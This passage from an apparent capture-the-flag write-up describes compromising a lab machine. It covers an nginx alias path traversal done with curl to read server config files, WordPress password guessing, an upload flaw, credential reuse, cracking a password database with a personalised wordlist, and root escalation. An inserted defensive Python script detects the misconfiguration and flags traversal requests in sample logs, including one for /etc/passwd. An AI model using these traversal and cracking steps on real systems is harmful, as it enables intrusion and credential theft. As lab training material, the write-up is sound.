So it basically tricks the web server into thinking we want a file inside the images directory while actually serving a file outside of the web directory.
From there we can enumerate the server for more info. One of the files we can access is:
curl http://mountaineer.thm/wordpress/images../etc/nginx/sites-available/default
which gives us a better idea of the server configuration. From there we can find one more vhost we were not aware of (by the way, I had already enumerated subdomains and vhosts using gobuster).
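The request above relies on an nginx `location` prefix without a trailing slash being paired with an `alias` directive that has one, so a path such as `images../` resolves one directory above the aliased folder. As an added defender-side example (not part of the original write-up), the Python below does two things: it lints an nginx config for that location/alias mismatch, and it scans access-log lines for requests whose URL-decoded path contains a traversal segment. The config block and the log lines are constructed samples, not the machine's real files.

```python
import re
from urllib.parse import unquote

# Constructed nginx server block showing the vulnerable pattern next to a safe one.
SAMPLE_CONF = """\
server {
    listen 80;
    root /var/www/html;
    location /wordpress/images {
        alias /var/www/html/wordpress/wp-content/uploads/;
    }
    location /static/ {
        alias /srv/static/;
    }
}
"""

# Constructed access-log lines (combined log format); the 10.0.0.9 requests are the suspicious ones.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress/images/logo.png HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /wordpress/images../etc/nginx/sites-available/default HTTP/1.1" 200 1422
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /wordpress/images..%2f..%2fetc/passwd HTTP/1.1" 200 980
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /wordpress/index.php HTTP/1.1" 200 3000
"""

LOCATION_RE = re.compile(r"location\s+(?:(=|~\*?|\^~)\s+)?([^\s{]+)\s*\{([^{}]*)\}")
ALIAS_RE = re.compile(r"alias\s+([^;\s]+)\s*;")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/')


def find_alias_traversal(conf: str) -> list[tuple[str, str]]:
    """Return (location, alias) pairs where a prefix location lacks a trailing slash
    but its alias has one; exact (=) and regex (~) locations are not prefix matches
    and are skipped."""
    hits = []
    for modifier, path, body in LOCATION_RE.findall(conf):
        if modifier == "=" or modifier.startswith("~"):
            continue
        alias = ALIAS_RE.search(body)
        if alias and not path.endswith("/") and alias.group(1).endswith("/"):
            hits.append((path, alias.group(1)))
    return hits


def _is_traversal(path: str) -> bool:
    """True if any path segment is '..' or ends in '..' (e.g. 'images..')."""
    for seg in path.split("/"):
        if seg == ".." or (len(seg) > 2 and seg.endswith("..")):
            return True
    return False


def find_traversal_requests(log: str) -> list[tuple[str, str]]:
    """Return (client_ip, decoded_path) for log lines whose request path traverses."""
    hits = []
    for line in log.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # Decode percent-encoding so %2f-obfuscated dot segments are caught too.
        path = unquote(m.group(1).split("?", 1)[0])
        if _is_traversal(path):
            hits.append((line.split(" ", 1)[0], path))
    return hits


if __name__ == "__main__":
    for loc, alias in find_alias_traversal(SAMPLE_CONF):
        print(f"misconfigured: location {loc} -> alias {alias} (add a trailing slash to the location or drop it from the alias)")
    for ip, path in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```

The fix the linter points at is to make the two directives agree: either `location /wordpress/images/` with the trailing slash, or an `alias` without one. The log scanner decodes before matching, since a `%2f`-encoded dot segment looks harmless in the raw line.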
So we only need to add this to the hosts file. Let's visit it and see what we have.
So from here I tried to brute-force it, but there is a rate limit, so I believe we have to guess the password since we can neither crack nor brute-force it, or maybe there is another way I am not aware of.
I tried most of them and, lucky me, K2 works, and I guess you can tell what the password is.
From there we can find two emails.
I tried to SSH in using the password, but it does not work. So I tried to log into WordPress as the user K2, and it actually works.
From here I can recall that we have an upload vuln if we have at least contributor access.
This is quite simple: we can use the same creds from Roundcube.
Access as kangchenjunga
So here I was stuck for a while. Once we log in as K2 we can see an email to a guy called Lhotse, whose directory we have access to.
And here I searched about this and found it is some sort of encrypted database which holds some information. We can use john to crack it, so I tried john with the rockyou file, but it does not work. Thanks to bob again, I saw that he uses a tool called cupp which helps generate passwords based on user information.
To see the file content, just upload the file, enter the key and it will open. And from there we can find the username and password for the user kangchenjunga.
Shell as Root
So once we log in we will find the flag as well as a note which actually made me laugh.
This guy does not want to be hacked, so he set a strong password, but his friend messed it all up LOL 😂.
So becoming root is quite simple really. Reading the note above we can tell that the root user uses this guy's account. So let's see.
Hmmmm, is it really??
Indeed. So let's log in as root.
Conclusion
In the end this machine was so fun. It is actually not that hard, but there were a couple of key points which were challenging: the fact that I spent 3h using sqlmap to dump the whole users database with nothing to show for it at the end, while the real exploit was quite simple; also, cracking the file was quite easy, but using the person's information to get the real password was actually so smart and a new idea I can use in future challenges.
Finally I would like to thank and give credit to bob; he really helped me, thank you bob. Check out his write-up down below and show some love.